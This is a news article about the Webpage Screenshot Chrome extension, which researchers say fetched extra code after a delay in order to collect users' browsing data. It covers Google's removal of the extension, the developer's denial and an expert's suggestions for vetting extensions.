Maksim Kabakou - Fotolia
Webpage Screenshot, an add-on screen-capturing tool for Google Chrome, managed to bypass Google Inc.'s security controls and secretly collected users' browsing details without their knowledge, according to researchers, leading to new questions about the security of third-party Chrome extensions.
Researchers at Heimdal Security in Demark published a report on Webpage Screenshot this week and went so far as to call the popular extension "spyware." Yet when Webpage Screenshot, which has 1.2 million users, was released for use, it had not demonstrated any malicious behavior. According to Heimdal Security, its spyware capabilities were initiated a week later via download of additional code from the Web, which allowed the extension to collect data such as user's IP addresses, URLs visited, files and data loaded from URLs, search queries entered and even personal contact information.
"On the surface it all looks good: When you run it in the sandbox environment, it doesn't look like it does anything malicious," said Peter Kruse, founder of CSIS Security Group, which spun off Heimdal Security last year. "A time wait is usually a bad sign, because who would put a function like time wait into good code? You can use it as an indicator of a potential malicious thing."
The spyware functions of Webpage Screenshot were actually published separately on StopMalvertising a year ago. According to Kruse, the discovery was simply not picked up by media and the extension continued to collect and sell user browser data.
Swedish newspaper Dagens Nyheter (DN) reported on the popular extension this week when the malicious behavior was discovered by Sentor MSS, a security services firm based in Stockholm. The Swedish media spread this news to the Danish media, and it eventually landed in the Heimdal Security lab.
"We issued a warning as well," Kruse said, "because there was quite many [40,000] Danish users using this extension."
The warnings eventually led Google to remove the add-on from its Google Chrome Web Store earlier this week.
"It is against the Chrome Web Store Content Policies to distribute malware," a Google spokesperson wrote in an email to SearchSecurity. "When we detect items containing malware or learn of them through reports, we remove them from the Chrome Web Store and from active Chrome instances."
Primary purpose: Screenshots or data exfiltration?
During its research into Webpage Screenshot, Heimdal Security followed the registrant information on the extension's homepage to the developer: Aminadav Glickshein, a resident of Israel. According to Heimdal, Glickshein used a server in New York to redirect data transmitted by the app that included sensitive information.
"The primary purpose of this extension is not to provide a screenshot function," Kruse said. "That's actually kind of lame in the first place, because you have built-in screenshot functions."
Last year, Chrome instituted its Single Purpose Policy, requiring extensions to serve only a single purpose. Chrome extensions undergo testing for snooping and unwanted transmission of user browsing data -- the unwanted complications that led to this policy being instated.
"It's literally just a camouflage tool that has grown very large in popularity," Kruse said. "The real purpose [of the extension] was to extract a lot of traffic, a lot of data, and a lot of user behavior."
But Glickshein denies this. "Private data [was] never sent to any server," Glickshein said in an email to SearchSecurity. "Google removed [the extension] because of reporters."
Yet the DN newspaper reported it was in contact with "the owner" of Webpage Screenshot and that he told the newspaper that the aim of the extension was to "produce statistics on surfing behavior," which he called commercially valuable.
Chrome extension security
Despite the controversy surrounding Webpage Screenshot and the long-standing security issues with add-ons for all Web browsers, Kruse acknowledged Google is doing the best it can with Chrome extension security considering the many submissions that it receives. To some degree, he said, the end users need to trust the vendor whose application they are using. Asking Google to do a complete manual code review for every add-on, he noted, would be unfeasible.
"Obviously when you have to validate a lot of applications, a lot of extensions, in the day -- you need to automate that process," Kruse said. "And [if] you don't take into account that there are things that might sleep for a while or might include updating things from an external side, then there's bound to be a security risk."
But Kruse said Google could do more in the realm of vendor verification. He suggested implementing a Netflix-style star-based ratings system to gauge trust, with users who have been submitting quality code for a while earning more trust stars. He also recommended checking apps for sleep functions within its code, for which "even being creative" he could not come up with a legitimate use.